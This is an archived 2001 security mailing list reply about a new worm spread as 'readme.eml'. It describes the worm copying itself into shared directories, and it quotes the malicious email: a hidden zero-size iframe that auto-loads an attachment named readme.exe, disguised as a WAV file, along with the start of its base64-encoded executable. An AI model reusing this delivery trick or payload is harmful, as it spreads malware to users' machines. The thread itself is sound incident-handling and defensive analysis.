RE: New worm? 'readme.eml'

From: Mark Ng (hostmasterat_private)
Date: Tue Sep 18 2001 - 08:51:00 PDT

Next message: Tony Abedini: "Re: New worm? 'readme.eml'"

Previous message: John Q. Public: "Re: Fwd: Massive CMD.EXE and ROOT.EXE scan"
Maybe in reply to: Pedro Miller Rabinovitch: "New worm? 'readme.eml'"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I've just seen this infest an NT share.  I've isolated it to one drive (this
machine is a fileserver with no access of it's own to the internet.)
Further following behaviour, this worm copies itself into available
directories, (I think using a client machine, as this is restricted to one
drive only one department has access to) naming itself the same as other
files in that directory, except as a .eml .  Upon opening in a text editor,
the same content as described below by Pedro appears.

>
> 
> When I connected to the originating server (femm.tdkomm.com.br), I 
> saw the normal web page for the institution, plus a pop-up window for 
> http://femm.tdkomm.com.br/readme.DONT.eml (without "DONT"), as 
> follows:
> 
> 
> MIME-Version: 1.0
> Content-Type: multipart/related;
> type="multipart/alternative";
> boundary="====_ABC1234567890DEF_===="
> X-Priority: 3
> X-MSMail-Priority: Normal
> X-Unsent: 1
> 
> --====_ABC1234567890DEF_====
> Content-Type: multipart/alternative;
> boundary="====_ABC0987654321DEF_===="
> 
> --====_ABC0987654321DEF_====
> Content-Type: text/html;
> charset="iso-8859-1"
> Content-Transfer-Encoding: quoted-printable
> 
> 
> <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
> <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
> </iframe></BODY></HTML>
> --====_ABC0987654321DEF_====--
> 
> --====_ABC1234567890DEF_====
> Content-Type: audio/x-wav;
> name="readme.exe"
> Content-Transfer-Encoding: base64
> Content-ID: <EA4DMGBP9p>
> 
> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAA
> AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW
> 4gaW4gRE9TIG1v
> ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJ
> mqSzxytU88cbVO
> PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAH8AAAEAAAB/UE
> UAAEwBBQB1Oqc7
> AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAIAAAAAAFzYAEA
> AAABAAAAQAAAAA
> ... (worm code follows)
> 
> I've inspected the executable code, and it reads like a worm. (doh)
> 
> Has anyone seen this?
> 

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Tony Abedini: "Re: New worm? 'readme.eml'"
Previous message: John Q. Public: "Re: Fwd: Massive CMD.EXE and ROOT.EXE scan"
Maybe in reply to: Pedro Miller Rabinovitch: "New worm? 'readme.eml'"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 13:26:52 PDT